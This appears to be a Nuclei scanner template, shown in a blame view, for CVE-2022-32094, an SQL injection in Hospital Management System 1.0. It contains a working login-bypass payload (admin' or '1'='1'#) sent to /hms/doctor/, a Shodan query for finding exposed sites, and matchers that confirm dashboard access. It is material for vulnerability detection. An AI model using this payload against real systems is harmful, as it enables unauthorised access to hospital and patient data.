nuclei-templates/http/cves/2022/CVE-2022-32094.yaml

49 lines
1.5 KiB
YAML
Raw Normal View History

2022-09-14 12:54:03 +00:00
id: CVE-2022-32094
info:
name: Hospital Management System 1.0 - SQL Injection
2022-09-14 12:54:03 +00:00
author: arafatansari
severity: critical
2022-09-14 12:54:03 +00:00
description: |
Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-09-14 12:54:03 +00:00
reference:
- https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/
- https://nvd.nist.gov/vuln/detail/CVE-2022-32094
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2022-09-14 12:54:03 +00:00
cve-id: CVE-2022-32094
cwe-id: CWE-89
cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:*:*:*:*:*:*:*:*
epss-score: 0.00931
2022-09-14 12:54:03 +00:00
metadata:
max-request: 1
2022-09-14 12:54:03 +00:00
shodan-query: http.html:"Hospital Management System"
2023-06-04 08:13:42 +00:00
verified: true
2022-09-14 14:39:19 +00:00
tags: cve,cve2022,hms,cms,sqli,auth-bypass
2022-09-14 12:54:03 +00:00
http:
2022-09-14 12:54:03 +00:00
- raw:
- |
POST /hms/doctor/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
host-redirects: true
2022-09-14 12:54:03 +00:00
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-09-14 14:39:19 +00:00
- '<title>Doctor | Dashboard</title>'
- 'View Appointment History'
condition: and
2022-09-14 12:54:03 +00:00
- type: status
status:
- 200